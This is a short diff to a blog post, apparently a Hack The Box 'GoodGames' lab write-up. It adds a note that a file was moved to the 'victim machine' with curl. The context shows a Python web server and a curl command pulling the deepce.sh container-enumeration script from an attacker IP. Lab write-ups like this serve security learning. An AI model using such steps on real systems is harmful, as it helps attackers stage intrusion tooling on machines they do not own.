meisty/meisty.github.io/_posts/2022-02-22-HTBGoodGames.md

 ```bash
 python3 -m http-server 8000
 ```
-and transferred it to the victim machine.
+and transferred it to the victim machine by using curl on the victim machine.

 ```bash
 curl http://10.10.14.36:8000/deepce.sh